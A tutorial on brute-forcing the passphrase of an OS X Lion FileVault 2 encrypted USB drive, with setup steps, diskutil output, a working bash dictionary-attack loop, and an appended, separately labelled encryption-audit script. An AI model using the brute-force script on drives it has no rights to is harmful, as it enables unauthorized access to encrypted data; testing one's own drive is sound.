I was curious whether I could script a dictionary attack against one of the OS X Lion FileVault 2 encrypted external drives. If you haven’t set one up before, you need to be on Lion. Grab a spare USB storage stick, and make sure to back up any data from the device first: encrypting the device by the book will erase and destroy the existing contents.

  1. Go into “Disk Utility”
  2. Plug in the desired USB storage stick
  3. Click on the device in the list
  4. Click on the Erase tab
  5. Pull down the Format box and choose one of the Encrypted options like: Mac OS Extended (Journaled, Encrypted)
  6. Click Erase
  7. When prompted, provide a desired password.

Now that you have set up an encrypted device, you can use it to test this process.

  1. First eject the USB device
  2. Unplug it
  3. Plug it back in
  4. Click cancel and do not enter the passphrase

Now onto the rest of the process.

Each encrypted volume gets a unique identifier. You need to know this ID to put into the script we will use to loop through our password dictionary. Go to a terminal session and issue the following command.

diskutil coreStorage list

We can see the volume ID of our device in the output. In the example below, the ID is B75621A3-C3F5-40B4-A441-37ECA3F4CD14. Copy that ID.

CoreStorage logical volume groups (1 found)
|
+-- Logical Volume Group BF468AAA-6532-4BFE-9B0D-FA4C5169737F
    =========================================================
    Name:         test
    Sequence:     1
    Free Space:   0 B (0 B)
    |
    +-< Physical Volume 0EA1F87D-DDE8-47A1-A424-F7D0FC7D0DAB
    |   ----------------------------------------------------
    |   Index:    0
    |   Disk:     disk3s1
    |   Status:   Online
    |   Size:     1010786304 B (1.0 GB)
    |
    +-> Logical Volume Family 7D96757D-734A-4174-BEF8-74BA48EDFFC0
        ----------------------------------------------------------
        Sequence:               2
        Encryption Status:      Unlocked
        Encryption Type:        AES-XTS
        Encryption Context:     Present
        Conversion Status:      NoConversion
        Has Encrypted Extents:  Yes
        Conversion Direction:   -none-
        |
        +-> Logical Volume B75621A3-C3F5-40B4-A441-37ECA3F4CD14
            ---------------------------------------------------
            Disk:               disk4
            Status:             Online
            Sequence:           2
            Size (Total):       953106432 B (953.1 MB)
            Size (Converted):   -none-
            Revertible:         No
            LV Name:            test
            Volume Name:        test
            Content Hint:       Apple_HFS

Create the script file below, using vi in the terminal or your editor of choice. Replace DEVICEIDHERE in the script with the ID from your device. Save the script, then make it executable with chmod +x.

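#!/bin/bash

# Try each word from the dictionary file, skipping lines that contain "#".
for word in $(grep -v "#" /Volumes/ExternalDrive/Dictionaries/test.txt)
do
    # Pass the candidate to diskutil on stdin, without a trailing newline.
    echo -n "$word" | diskutil coreStorage unlockVolume DEVICEIDHERE -stdinpassphrase

    # The script treats exit status 0 from diskutil as a successful unlock.
    if [[ $? = 0 ]]
    then
        echo "Password found!"
        echo "$word"
        exit 0
    fi
done

echo "Password not found."
exit 1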

Now make yourself a password text file named test.txt with several passwords in it, including the actual password. Make sure to fix the path to the test.txt file in the for line of the script.

Fire off the script and you should see your attached device mount when it hits the actual password from the list.

There you go. Just edit in the appropriate device ID and repeat as needed.
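The `diskutil coreStorage list` output shown earlier also reports the encryption type and status of each volume family, which is what you would check when auditing attached drives. The following is an added example, not part of the original post: it parses that listing into one line per logical volume and flags unencrypted ones. The function names, the second sample family, and the "None" value for unencrypted volumes are assumptions.

```bash
#!/bin/bash
# Added example, not from the original post: encryption audit of CoreStorage volumes.
# Reads `diskutil coreStorage list` output on stdin; prints one tab-separated line
# per logical volume: UUID, LV name, encryption type, encryption status.
cs_summary() {
    awk '
        function emit() {
            if (uuid != "") printf "%s\t%s\t%s\t%s\n", uuid, name, etype, estatus
            uuid = ""; name = ""
        }
        # Family-level encryption fields apply to the logical volumes below them.
        /^[ |]*\+-> Logical Volume Family / { emit(); etype = estatus = "unknown" }
        /^[ |]*Encryption Type:/   { etype = $NF }
        /^[ |]*Encryption Status:/ { estatus = $NF }
        # A logical volume line carries exactly one token (the UUID) after the label.
        /^[ |]*\+-> Logical Volume [^ ]+[ \t]*$/ { emit(); uuid = $NF }
        /^[ |]*LV Name:/ { sub(/^.*LV Name:[ \t]*/, ""); name = $0 }
        END { emit() }
    '
}

# Prints volumes that are not encrypted and returns 1 if there are any.
# Assumption: an unencrypted family reports "Encryption Type: None".
cs_unencrypted() {
    cs_summary | awk -F '\t' '$3 == "None" || $3 == "unknown" { print; bad = 1 } END { exit bad + 0 }'
}

# Constructed sample: the listing from the post trimmed to the parsed lines, plus a
# made-up unencrypted family with placeholder UUIDs.
sample_listing() {
    cat <<'EOF'
+-- Logical Volume Group BF468AAA-6532-4BFE-9B0D-FA4C5169737F
    +-> Logical Volume Family 7D96757D-734A-4174-BEF8-74BA48EDFFC0
        Encryption Status:      Unlocked
        Encryption Type:        AES-XTS
        |
        +-> Logical Volume B75621A3-C3F5-40B4-A441-37ECA3F4CD14
            LV Name:            test
    +-> Logical Volume Family 00000000-0000-0000-0000-00000000000A
        Encryption Status:      Unlocked
        Encryption Type:        None
        +-> Logical Volume 00000000-0000-0000-0000-00000000000B
            LV Name:            scratch disk
EOF
}

sample_listing | cs_summary
```

On a real system, pipe the live listing in instead: `diskutil coreStorage list | cs_unencrypted`.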
